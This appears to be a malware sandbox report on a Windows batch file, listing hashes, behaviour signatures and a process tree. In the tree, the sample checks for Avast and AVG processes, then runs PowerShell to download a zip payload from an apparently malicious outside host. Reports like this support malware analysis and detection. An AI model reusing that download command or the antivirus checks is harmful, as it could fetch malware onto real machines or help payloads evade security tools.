Analysis
-
max time kernel
15s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-11-2024 04:04
Static task
static1
Behavioral task
behavioral1
Sample
8620fa4c62bd53e5b70aa10e6205f1ceffcd49bd7ca3b01cbe8f539273dd6695.bat
Resource
win7-20240903-en
General
-
Target
8620fa4c62bd53e5b70aa10e6205f1ceffcd49bd7ca3b01cbe8f539273dd6695.bat
-
Size
29KB
-
MD5
af0c16e6a8877ea5a72d5d4a876e8302
-
SHA1
bc78be8297b41156b56fb22f7a84e7a85a183f7a
-
SHA256
8620fa4c62bd53e5b70aa10e6205f1ceffcd49bd7ca3b01cbe8f539273dd6695
-
SHA512
73ec801912075022dba96acb14b0cf6397b09af73b8e2535bb8870783196fd87ccbcb3f1530151c5c384f05d707d0bc593de33e33a85cb25872648db1884f629
-
SSDEEP
768:gTYcpQyuPmhDGEhtKC7/ZAmvh3MT2iabBp2KHrxWPylMhQYXTtlE:gTYcpQyuPmhDGEhtKC7BAmvtO2ip88Pk
Malware Config
Signatures
-
pid Process 2408 powershell.exe 2812 powershell.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 1264 tasklist.exe 1576 tasklist.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2408 powershell.exe 2812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1264 tasklist.exe Token: SeDebugPrivilege 1576 tasklist.exe Token: SeDebugPrivilege 2408 powershell.exe Token: SeDebugPrivilege 2812 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2848 wrote to memory of 1264 2848 cmd.exe 32 PID 2848 wrote to memory of 1264 2848 cmd.exe 32 PID 2848 wrote to memory of 1264 2848 cmd.exe 32 PID 2848 wrote to memory of 540 2848 cmd.exe 33 PID 2848 wrote to memory of 540 2848 cmd.exe 33 PID 2848 wrote to memory of 540 2848 cmd.exe 33 PID 2848 wrote to memory of 1576 2848 cmd.exe 35 PID 2848 wrote to memory of 1576 2848 cmd.exe 35 PID 2848 wrote to memory of 1576 2848 cmd.exe 35 PID 2848 wrote to memory of 2096 2848 cmd.exe 36 PID 2848 wrote to memory of 2096 2848 cmd.exe 36 PID 2848 wrote to memory of 2096 2848 cmd.exe 36 PID 2848 wrote to memory of 2408 2848 cmd.exe 37 PID 2848 wrote to memory of 2408 2848 cmd.exe 37 PID 2848 wrote to memory of 2408 2848 cmd.exe 37 PID 2848 wrote to memory of 2812 2848 cmd.exe 38 PID 2848 wrote to memory of 2812 2848 cmd.exe 38 PID 2848 wrote to memory of 2812 2848 cmd.exe 38
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\8620fa4c62bd53e5b70aa10e6205f1ceffcd49bd7ca3b01cbe8f539273dd6695.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq AvastUI.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
C:\Windows\system32\find.exefind /i "AvastUI.exe"2⤵PID:540
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq avgui.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\system32\find.exefind /i "avgui.exe"2⤵PID:2096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://goninvoicceme.shop:7070/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://goninvoicceme.shop:7070/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4HM19E03LGAWS6FSC571.temp
Filesize7KB
MD55024d9a5830b7a3ed90266fc8e44408e
SHA1b0bea51f91d448d8bb127a5e98651bfb4fb715b8
SHA256e7051e846a424cf117874dfe8486159088627f078b112578521764b2ac52c9eb
SHA512b1f5b618af0bfdc1e44c0f44000531540c927bc41e4fbfa37e1cf52c3e7187b4f81a7cbd282fec0a87fb878f9708b0eebbf09d3e4d03b02bc4ba31d77a2f6ac8